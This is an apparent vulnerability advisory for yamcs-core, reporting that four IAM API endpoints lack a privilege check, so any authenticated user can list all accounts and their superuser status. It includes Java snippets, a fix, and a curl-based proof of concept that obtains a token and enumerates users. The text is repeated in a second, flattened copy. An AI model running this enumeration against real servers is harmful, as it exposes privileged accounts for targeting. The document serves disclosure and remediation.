Summary
The IAM API endpoints (listUsers, getUser, listGroups, and getGroup) in yamcs-core do not enforce the required SystemPrivilege.ControlAccess check. As a result, any authenticated user (even those with low or no privileges) can enumerate all user accounts in the system, including their usernames, superuser status, and group memberships.
This constitutes a broken access control vulnerability (CWE-862) that leaks sensitive user information.
Root Cause
File: yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java:125,180,357,372
listUsers(), getUser(), listGroups(), and getGroup() do not require SystemPrivilege.ControlAccess. Any authenticated user — regardless of privileges — can enumerate all users, their superuser status, and group memberships:
// listUsers — NO checkSystemPrivilege
public void listUsers(Context ctx, Empty request, ...) {
var sensitiveDetails = ctx.user.hasSystemPrivilege(SystemPrivilege.ControlAccess);
// sensitiveDetails=false for low-priv users, but name/superuser/active still exposed
for (User user : users) {
UserInfo userb = toUserInfo(user, sensitiveDetails, directory);
responseb.addUsers(userb);
}
}Compare with properly protected endpoints:
// createUser — correctly protected
public void createUser(Context ctx, ...) {
ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess); // presentImpact
Any authenticated user can:
- List all user accounts in the system
- Identify which accounts have superuser privileges
- Use this information to target privileged accounts
Proof of Concept
# Authenticate as any low-privilege user GET access_token
curl -s -X POST "http://localhost:8090/auth/token" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "grant_type=password&username=lowpriv&password=lowpriv123"
# Enumerate all users — no ControlAccess required
curl -s "http://TARGET:8090/api/users" \
-H "Authorization: Bearer $TOKEN" #paste access_token
Output (confirmed):
{
"users": [
{ "name": "admin", "superuser": true, "active": true },
{ "name": "operator", "superuser": true, "active": true },
{ "name": "lowpriv", "superuser": false, "active": true }
]
}Fix
Add ControlAccess check to listUsers, getUser, listGroups, getGroup:
public void listUsers(Context ctx, Empty request, ...) {
ctx.checkSystemPrivilege(SystemPrivilege.ControlAccess); // ADD THIS
...
}References
ex-cal1bur Reporter
Summary
The IAM API endpoints (
listUsers,getUser,listGroups, andgetGroup) inyamcs-coredo not enforce the requiredSystemPrivilege.ControlAccesscheck. As a result, any authenticated user (even those with low or no privileges) can enumerate all user accounts in the system, including their usernames, superuser status, and group memberships.This constitutes a broken access control vulnerability (CWE-862) that leaks sensitive user information.
Root Cause
File:
yamcs-core/src/main/java/org/yamcs/http/api/IamApi.java:125,180,357,372listUsers(),getUser(),listGroups(), andgetGroup()do not requireSystemPrivilege.ControlAccess. Any authenticated user — regardless of privileges — can enumerate all users, their superuser status, and group memberships:Compare with properly protected endpoints:
Impact
Any authenticated user can:
Proof of Concept
Output (confirmed):
{ "users": [ { "name": "admin", "superuser": true, "active": true }, { "name": "operator", "superuser": true, "active": true }, { "name": "lowpriv", "superuser": false, "active": true } ] }Fix
Add
ControlAccesscheck tolistUsers,getUser,listGroups,getGroup:References